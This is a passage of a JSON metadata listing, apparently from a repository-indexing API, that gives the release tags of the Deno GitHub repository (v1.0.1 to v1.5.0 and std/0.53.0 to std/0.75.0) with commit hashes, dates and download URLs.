3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","